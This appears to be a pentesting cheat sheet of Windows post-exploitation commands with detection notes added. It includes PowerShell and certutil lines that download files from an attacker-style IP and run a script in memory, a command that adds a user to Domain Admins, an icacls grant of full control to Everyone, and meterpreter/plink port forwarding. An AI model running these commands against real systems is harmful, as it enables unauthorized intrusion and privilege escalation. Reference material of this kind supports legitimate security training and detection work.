# 99 Basic Command

{% tabs %}
{% tab title="Downloading files" %}

```
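// File download: certutil.exe (a native binary) or Invoke-WebRequest (a PowerShell cmdlet).
// Plain http:// gives no integrity protection, so check the downloaded file with Get-FileHash before using it.
// Detection: certutil fetching a URL is a widely alerted pattern, and -urlcache leaves a copy in the user's CryptnetUrlCache folder.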
certutil.exe -urlcache -split -f http://ip/file file 
Invoke-WebRequest "https://server/filename" -OutFile "C:\Windows\Temp\filename"

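// PowerShell download. "-exec bypass" sets the execution policy for this one process only;
// execution policy is a safety feature, not a security boundary, so application control (AppLocker/WDAC) is what actually restricts this.
// Detection: an executable appearing under C:\Windows\System32\spool\drivers\color\ is unusual and worth alerting on.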
powershell.exe -exec bypass -command "Invoke-WebRequest 'http://10.10.14.18:8888/41020.exe' -OutFile 'C:\windows\system32\spool\drivers\color\41020.exe'" 

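// PowerShell download-and-execute: IEX runs the fetched script in memory on the local machine (nothing runs on a remote host).
// The script arrives over plain HTTP and is executed without any integrity check.
// Detection: Script Block Logging (event 4104) and AMSI still see the script content even though no file is written.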
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.18:8888/Sherlock.ps1'); Find-AllVulns -Command 'start powershell.exe'" 
```

{% endtab %}

{% tab title="Changing Permissions of a file" %}

```
# Grants the Everyone group Full control (F) on text.txt: any account can then read, modify,
# delete, or re-permission the file. On anything that matters, grant a named user or group
# the narrowest right that works instead, e.g. R (read) or M (modify).
# Running `icacls text.txt` with no options prints the current ACL, which is how to audit for this.
icacls text.txt /grant Everyone:F
```

{% endtab %}

{% tab title="Adding user to Domain admins" %}

```
# Add-DomainGroupMember is a PowerView function, not a built-in cmdlet, so PowerView must be loaded first.
# Adds the account fkclai to Domain Admins; the caller needs write access to that group's membership.
# Detection: with security group management auditing enabled, domain controllers log the change as
# Security event 4728 (member added to a security-enabled global group); alert on any 4728 for Domain Admins.
Add-DomainGroupMember -Identity 'Domain Admins' -Members fkclai -Verbose
```

{% endtab %}

{% tab title="Base64 Encode-Decode" %}

```
# certutil's "Base64" is PEM-style: -encode wraps the data in -----BEGIN CERTIFICATE----- /
# -----END CERTIFICATE----- lines, so foo.b64 is not a bare Base64 string.
# Both commands refuse to overwrite an existing output file unless -f is added.
# Detection: certutil -decode producing an .exe is a common alert condition.
certutil -decode foo.b64 foo.exe
certutil -encode foo.exe foo.b64
```

{% endtab %}

{% tab title="Port Forwarding" %}

```
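# Port forward using plink: -R 8080:127.0.0.1:8080 makes the SSH server (192.168.1.56) listen on its port 8080
# and relay connections to 127.0.0.1:8080 on the machine running plink.
# Note: -pw puts the password in the process command line, so it shows up in process-creation
# logs (Security event 4688 with command-line auditing, Sysmon event 1).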
plink.exe -l morph3 -pw pass123 192.168.1.56 -R 8080:127.0.0.1:8080

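# Port forward using meterpreter: -l is the listening port on the attacker's machine,
# -p and -r are the victim port and address reached through the session.
# The first line is the general form; the second is a concrete example (3306 is MySQL's default port).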
portfwd add -l attacker-port -p victim-port -r victim-ip
portfwd add -l 3306 -p 3306 -r 192.168.1.56
```

{% endtab %}
{% endtabs %}
